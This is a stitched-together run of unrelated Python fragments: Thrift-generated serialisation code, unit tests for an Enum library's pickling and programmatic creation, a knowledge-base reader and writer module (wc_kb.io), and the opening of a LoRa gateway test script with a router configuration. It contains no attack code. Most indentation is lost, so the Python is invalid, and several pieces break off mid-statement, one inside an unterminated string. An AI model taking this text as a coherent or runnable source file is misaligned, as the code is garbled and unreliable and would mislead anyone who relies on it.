(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.data = {}
(_ktype15, _vtype16, _size14) = iprot.readMapBegin()
for _i18 in range(_size14):
_key19 = iprot.readI32()
_val20 = iprot.readI32()
self.data[_key19] = _val20
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferMap_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.MAP, 1)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.data))
for kiter21, viter22 in self.data.items():
oprot.writeI32(kiter21)
oprot.writeI32(viter22)
            oprot.writeMapEnd()
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def test_pickle_int(self):
        if isinstance(IntStooges, Exception):
            raise IntStooges
test_pickle_dump_load(self.assertTrue, IntStooges.CURLY)
test_pickle_dump_load(self.assertTrue, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertTrue, FloatStooges.CURLY)
test_pickle_dump_load(self.assertTrue, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertTrue, Answer.him)
test_pickle_dump_load(self.assertTrue, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertTrue, Question.who)
test_pickle_dump_load(self.assertTrue, Question)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = _reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum('BadPickle', 'dill sweet bread-n-butter')
aenum._make_class_unpicklable(BadPickle)
globals()['BadPickle'] = BadPickle
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertTrue(Period(2) is Period.noon)
self.assertTrue(getattr(Period, 'night') is Period.night)
self.assertTrue(Period['morning'] is Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__hash__'))
def test_iteration_order(self):
class Season(Enum):
__order__ = 'SUMMER WINTER AUTUMN SPRING'
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_iteration_order_reversed(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_iteration_order_with_unorderable_values(self):
class Complex(Enum):
a = complex(7, 9)
b = complex(3.14, 2)
c = complex(1, -1)
d = complex(-77, 32)
self.assertEqual(
list(Complex),
[Complex.a, Complex.b, Complex.c, Complex.d],
)
def test_programatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
dict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
if pyver < 3.0:
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode(self):
SummerMonth = Enum('SummerMonth', unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_list(self):
SummerMonth = Enum('SummerMonth', [unicode('june'), unicode('july'), unicode('august')])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_iterable(self):
SummerMonth = Enum(
'SummerMonth',
((unicode('june'), 1), (unicode('july'), 2), (unicode('august'), 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_from_unicode_dict(self):
SummerMonth = Enum(
'SummerMonth',
dict(((unicode('june'), 1), (unicode('july'), 2), (unicode('august'), 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
if pyver < 3.0:
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_type(self):
SummerMonth = Enum('SummerMonth', unicode('june july august'), type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programmatic_function_unicode_class(self):
if pyver < 3.0:
class_names = unicode('SummerMonth'), 'S\xfcmm\xe9rM\xf6nth'.decode('latin1')
else:
class_names = 'SummerMonth', 'S\xfcmm\xe9rM\xf6nth'
for i, class_name in enumerate(class_names):
if pyver < 3.0 and i == 1:
self.assertRaises(TypeError, Enum, class_name, unicode('june july august'))
else:
SummerMonth = Enum(class_name, unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e.value, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, '<NAME>')
self.assertTrue(Name.BDFL, Name('<NAME>'))
self.assertTrue(Name.BDFL is getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertTrue, Name.BDFL)
def test_extending(self):
def bad_extension():
class Color(Enum):
red = 1
green = 2
blue = 3
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertRaises(TypeError, bad_extension)
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertFalse(type(whatever.really) is whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
def wrong_inherit():
class Wrong(Enum, str):
NotHere = 'error before this point'
self.assertRaises(TypeError, wrong_inherit)
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertTrue(Number.one._member_type_ is int)
self.assertTrue(Number._member_type_ is int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertTrue(String.yarn._member_type_ is str)
self.assertTrue(String._member_type_ is str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertTrue(Plain.vanilla._member_type_ is object)
self.assertTrue(Plain._member_type_ is object)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertTrue(Monochrome(Gender.female) is Monochrome.white)
def test_mixed_enum_in_call_2(self):
        class Monochrome(Enum):
            black = 0
            white = 1
        class Gender(IntEnum):
            male = 0
            female = 1
        self.assertTrue(Monochrome(Gender.female) is Monochrome.white)
<filename>wc_kb/io.py
""" Reading and writing knowledge bases to/from files.
Supported file types:
* Comma separated values (.csv)
* Excel (.xlsx)
* Tab separated values (.tsv)
:Author: <NAME> <<EMAIL>>
:Date: 2018-02-12
:Copyright: 2018, Karr Lab
:License: MIT
"""
from . import core
from . import eukaryote
from . import prokaryote
from . import util
from wc_utils.util.string import indent_forest
import Bio.SeqIO
import Bio.SeqRecord
import obj_tables
import os
import shutil
import wc_kb
import wc_kb.config.core
import warnings
PROKARYOTE_MODELS = (
core.KnowledgeBase,
core.Cell,
core.Compartment,
core.DnaSpeciesType,
core.ChromosomeFeature,
prokaryote.TranscriptionUnitLocus,
prokaryote.GeneLocus,
prokaryote.RnaSpeciesType,
prokaryote.ProteinSpeciesType,
core.ComplexSpeciesType,
core.MetaboliteSpeciesType,
core.SpeciesTypeProperty,
core.Concentration,
core.Observable,
core.Reaction,
core.RateLaw,
core.Parameter,
core.Evidence,
core.Experiment,
core.Reference)
EUKARYOTE_MODELS = (
core.KnowledgeBase,
core.Cell,
core.Compartment,
core.DnaSpeciesType,
eukaryote.GeneLocus,
eukaryote.RegulatoryModule,
eukaryote.TranscriptSpeciesType,
eukaryote.ProteinSpeciesType,
eukaryote.PtmSite,
core.ComplexSpeciesType,
core.MetaboliteSpeciesType,
core.SpeciesTypeProperty,
core.Concentration,
core.Observable,
core.Reaction,
core.RateLaw,
core.Parameter,
core.Evidence,
core.Experiment,
core.Reference)
class Writer(obj_tables.io.Writer):
""" Write knowledge base to file(s) """
def run(self, core_path, knowledge_base,
seq_path=None, rewrite_seq_path=True, taxon='prokaryote',
models=None, get_related=True, include_all_attributes=False, validate=True,
title=None, description=None, keywords=None, version=None, language=None, creator=None,
write_schema=False, write_toc=True,
extra_entries=0, data_repo_metadata=False, schema_package=None, protected=True):
""" Write knowledge base to file(s)
Args:
knowledge_base (:obj:`core.KnowledgeBase`): knowledge base
core_path (:obj:`str`): path to save core knowledge base
seq_path (:obj:`str`, optional): path to save genome sequence
rewrite_seq_path (:obj:`bool`, optional): if :obj:`True`, the path to genome sequence in the saved knowledge base
will be updated to the newly saved seq_path
taxon (:obj:`str`, optional): type of model order to use
models (:obj:`list` of :obj:`Model`, optional): models in the order that they should
appear as worksheets; all models which are not in `models` will
follow in alphabetical order
get_related (:obj:`bool`, optional): if :obj:`True`, write object and all related objects
include_all_attributes (:obj:`bool`, optional): if :obj:`True`, export all attributes including those
                not explicitly included in `Model.Meta.attribute_order`
validate (:obj:`bool`, optional): if :obj:`True`, validate the data
title (:obj:`str`, optional): title
description (:obj:`str`, optional): description
keywords (:obj:`str`, optional): keywords
version (:obj:`str`, optional): version
language (:obj:`str`, optional): language
creator (:obj:`str`, optional): creator
write_schema (:obj:`bool`, optional): if :obj:`True`, include additional worksheet with schema
write_toc (:obj:`bool`, optional): if :obj:`True`, include additional worksheet with table of contents
extra_entries (:obj:`int`, optional): additional entries to display
data_repo_metadata (:obj:`bool`, optional): if :obj:`True`, try to write metadata information
about the file's Git repo; the repo must be current with origin, except for the file
schema_package (:obj:`str`, optional): the package which defines the `obj_tables` schema
used by the file; if not :obj:`None`, try to write metadata information about the
the schema's Git repository: the repo must be current with origin
protected (:obj:`bool`, optional): if :obj:`True`, protect the worksheet
Raises:
:obj:`ValueError`: if any of the relationships with knowledge bases and cells are not set
"""
if issubclass(self.get_writer(core_path), obj_tables.io.WorkbookWriter):
self.validate_implicit_relationships()
self.validate_implicit_relationships_are_set(knowledge_base)
if taxon == 'prokaryote':
models = PROKARYOTE_MODELS
elif taxon == 'eukaryote':
models = EUKARYOTE_MODELS
# default metadata for exported file
if title is None:
title = knowledge_base.id
if description is None:
description = knowledge_base.name
if version is None:
version = knowledge_base.version
if language is None:
language = 'wc_kb'
if creator is None:
creator = '{}.{}'.format(self.__class__.__module__, self.__class__.__name__)
# export sequences, if a path is provided
if seq_path:
dna_seqs = []
original_seq_paths = []
if knowledge_base.cell:
dna_species_types = knowledge_base.cell.species_types.get(
__type=core.DnaSpeciesType)
for species_type in dna_species_types:
dna_seqs.append(Bio.SeqRecord.SeqRecord(
species_type.get_seq(), species_type.id))
if rewrite_seq_path:
original_seq_paths.append((species_type, species_type.sequence_path))
species_type.sequence_path = seq_path
with open(seq_path, 'w') as file:
writer = Bio.SeqIO.FastaIO.FastaWriter(
file, wrap=70, record2title=lambda record: record.id)
writer.write_file(dna_seqs)
file.close()
# export core
super(Writer, self).run(core_path, knowledge_base, schema_name='wc_kb.' + taxon, models=models, get_related=get_related,
include_all_attributes=include_all_attributes, validate=validate,
title=title, description=description, version=version, language=language,
creator=creator,
write_schema=write_schema, write_toc=write_toc, extra_entries=extra_entries,
data_repo_metadata=data_repo_metadata, schema_package=schema_package,
protected=protected)
# reset sequence paths
if seq_path and rewrite_seq_path:
for species_type, path in original_seq_paths:
species_type.sequence_path = path
@classmethod
def validate_implicit_relationships(cls):
""" Check that relationships to :obj:`core.KnowledgeBase` and :obj:`core.Cell` do not need to be explicitly written to
workbooks because they can be inferred by :obj:`Reader.run`
Raises:
:obj:`Exception`: if the Excel serialization involves an unsupported implicit relationship
"""
for name, attr in core.KnowledgeBase.Meta.attributes.items():
if isinstance(attr, obj_tables.RelatedAttribute):
raise Exception(
"Relationships from `KnowledgeBase` not supported: {}.{} to {}".format(
'KnowledgeBase', name, attr.related_class.__name__))
for name, attr in core.KnowledgeBase.Meta.related_attributes.items():
if not isinstance(attr, obj_tables.OneToOneAttribute):
raise Exception(
"Relationships to `KnowledgeBase` that are not one-to-one are prohibited: {}.{} to {}".format(
attr.related_class.__name__, name, 'KnowledgeBase'))
for name, attr in core.Cell.Meta.attributes.items():
if isinstance(attr, obj_tables.RelatedAttribute):
if not isinstance(attr, obj_tables.OneToOneAttribute):
raise Exception(
"Relationships from `Cell` to `KnowledgeBase` that are not one-to-one are prohibited: {}.{} to {}".format(
'Cell', name, 'KnowledgeBase'))
if attr.related_class != core.KnowledgeBase:
raise Exception(
"Relationships from `Cell` to classes other than `KnowledgeBase` are prohibited: {}.{} to {}".format(
'Cell', name, attr.related_class.__name__))
for attr in core.Cell.Meta.related_attributes.values():
if not isinstance(attr, (obj_tables.OneToOneAttribute, obj_tables.ManyToOneAttribute)):
raise Exception(
"Relationships to `Cell` that are not one-to-one or many-to-one are prohibited: {}.{} to {}".format(
attr.related_class.__name__, attr.related_name, 'Cell'))
for name, attr in core.KnowledgeBase.Meta.related_attributes.items():
if attr.primary_class != core.Cell:
raise Exception(
"Relationships to `KnowledgeBase` from classes other than `Cell` are prohibited: {}.{} to {}".format(
attr.related_class.__name__, name, 'KnowledgeBase'))
return None # pragma: no cover; avoids missing branch coverage on previous for loop
def validate_implicit_relationships_are_set(self, knowledge_base):
""" Check that there is only 1 :obj:`KnowledgeBase` and <= 1 :obj:`Cell` and that each relationship
to :obj:`KnowledgeBase` and :obj:`Cell` is set. This is necessary to enable the :obj:`KnowledgeBase` and
:obj:`Cell` relationships to be implicit in the Excel output and added by :obj:`Reader.run`
Args:
knowledge_base (:obj:`core.KnowledgeBase`): knowledge base
Raises:
:obj:`ValueError`: if there are multiple instances of :obj:`core.KnowledgeBase` in the object graph
"""
cell = knowledge_base.cell
for obj in knowledge_base.get_related():
for attr in obj.Meta.attributes.values():
if isinstance(attr, obj_tables.RelatedAttribute) and attr.related_class == core.Cell:
val = getattr(obj, attr.name)
if val is None or val != cell:
raise ValueError('{}.{} must be set to the instance of `Cell`'.format(
obj.__class__.__name__, attr.name))
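
# Hedged usage sketch (not part of the original module): export a prokaryote
# knowledge base to an Excel workbook plus a FASTA genome sequence and read it
# back. The file paths are placeholders.
def _example_write_and_read_kb(kb, core_path='kb/core.xlsx', seq_path='kb/seq.fna'):
    Writer().run(core_path, kb, seq_path=seq_path, data_repo_metadata=False)
    return Reader().run(core_path, seq_path=seq_path)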
class Reader(obj_tables.io.Reader):
""" Read knowledge base from file(s) """
def run(self, core_path,
seq_path='', rewrite_seq_path=True, taxon='prokaryote',
models=None, ignore_missing_models=None, ignore_extra_models=None, ignore_sheet_order=None,
include_all_attributes=False, ignore_missing_attributes=None, ignore_extra_attributes=None, ignore_attribute_order=None,
group_objects_by_model=True, validate=True, read_metadata=False):
""" Read knowledge base from file(s)
Args:
core_path (:obj:`str`): path to core knowledge base
seq_path (:obj:`str`): path to genome sequence
rewrite_seq_path (:obj:`bool`, optional): if :obj:`True`, the path to genome sequence in the knowledge base
will be updated to the provided seq_path
taxon (:obj:`str`, optional): type of model order to use
models (:obj:`types.TypeType` or :obj:`list` of :obj:`types.TypeType`, optional): type
of object to read or list of types of objects to read
ignore_missing_models (:obj:`bool`, optional): if :obj:`False`, report an error if a worksheet/
file is missing for one or more models
ignore_extra_models (:obj:`bool`, optional): if :obj:`True` and all `models` are found, ignore
other worksheets or files
ignore_sheet_order (:obj:`bool`, optional): if :obj:`True`, do not require the sheets to be provided
in the canonical order
include_all_attributes (:obj:`bool`, optional): if :obj:`True`, export all attributes including those
                not explicitly included in `Model.Meta.attribute_order`
ignore_missing_attributes (:obj:`bool`, optional): if :obj:`False`, report an error if a
worksheet/file doesn't contain all of attributes in a model in `models`
ignore_extra_attributes (:obj:`bool`, optional): if :obj:`True`, do not report errors if
attributes in the data are not in the model
ignore_attribute_order (:obj:`bool`): if :obj:`True`, do not require the attributes to be provided
in the canonical order
group_objects_by_model (:obj:`bool`, optional): if :obj:`True`, group decoded objects by their
types
validate (:obj:`bool`, optional): if :obj:`True`, validate the data
read_metadata (:obj:`bool`, optional): if :obj:`True`, read metadata models
Returns:
:obj:`dict`: model objects grouped by `obj_tables.Model` class
Raises:
:obj:`ValueError`: if :obj:`core_path`
* Defines multiple knowledge bases or cells
* Represents objects that cannot be linked to a knowledge base and/or cell
"""
if issubclass(self.get_reader(core_path), obj_tables.io.WorkbookReader):
Writer.validate_implicit_relationships()
if taxon == 'prokaryote':
models = PROKARYOTE_MODELS
elif taxon == 'eukaryote':
models = EUKARYOTE_MODELS
else:
raise ValueError('Unsupported taxon "{}"'.format(taxon))
if read_metadata:
models = list(models) + [obj_tables.utils.DataRepoMetadata, obj_tables.utils.SchemaRepoMetadata]
ignore_missing_models = True
ignore_sheet_order = True
config = wc_kb.config.core.get_config()['wc_kb']['io']
if ignore_missing_models is None:
ignore_missing_models = not config['strict']
if ignore_extra_models is None:
ignore_extra_models = not config['strict']
if ignore_sheet_order is None:
ignore_sheet_order = not config['strict']
if ignore_missing_attributes is None:
ignore_missing_attributes = not config['strict']
if ignore_extra_attributes is None:
ignore_extra_attributes = not config['strict']
if ignore_attribute_order is None:
ignore_attribute_order = not config['strict']
# read core objects from file
objects = super(Reader, self).run(core_path, schema_name='wc_kb.' + taxon, models=models,
ignore_missing_models=ignore_missing_models,
ignore_extra_models=ignore_extra_models,
ignore_sheet_order=ignore_sheet_order,
include_all_attributes=include_all_attributes,
ignore_missing_attributes=ignore_missing_attributes,
ignore_extra_attributes=ignore_extra_attributes,
ignore_attribute_order=ignore_attribute_order,
group_objects_by_model=True,
validate=False)
        # Check whether the sequence paths are consistent
for idx, chromosome in enumerate(objects[wc_kb.core.DnaSpeciesType]):
if (chromosome.sequence_path is None) or (chromosome.sequence_path == ''):
chromosome.sequence_path = seq_path # Set seq_path to be what is provided to wc_kb.io.Reader()
if idx != 0:
                warnings.warn('Same sequence file is associated
# --- Revised 3-Clause BSD License ---
# Copyright (C) 2016-2019, SEMTECH (International) AG.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL SEMTECH BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Any,Dict,List,Optional,Tuple
import time
import re
import base64
import os
import struct
import json
import asyncio
import aiohttp
from aiohttp import web
import websockets
import ssl
from zlib import crc32
import logging
from id6 import Id6
import glob
logger = logging.getLogger('test')
router_config_EU863_6ch = {
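    # Assumed layout (per the Basics Station router_config message): each DR
    # entry is [spreading_factor, bandwidth_kHz, dnonly_flag]; -1 marks an
    # unused data-rate slot.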
'DRs': [[12, 125, 0],
[11, 125, 0],
[10, 125, 0],
[9, 125, 0],
[8, 125, 0],
[7, 125, 0],
[7, 250, 0],
[0, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0]],
'JoinEui': None,
'NetID': None,
'bcning': None,
'config': {},
'nodc': True,
'freq_range': [863000000, 870000000],
'hwspec': 'sx1301/1',
'max_eirp': 16.0,
'msgtype': 'router_config',
'protocol': 1,
'region': 'EU863',
'regionid': 1002,
'sx1301_conf': [{'chan_FSK': {'enable': False},
'chan_Lora_std': {'enable': False},
'chan_multiSF_0': {'enable': True, 'if': -375000, 'radio': 0},
'chan_multiSF_1': {'enable': True, 'if': -175000, 'radio': 0},
'chan_multiSF_2': {'enable': True, 'if': 25000, 'radio': 0},
'chan_multiSF_3': {'enable': True, 'if': 375000, 'radio': 0},
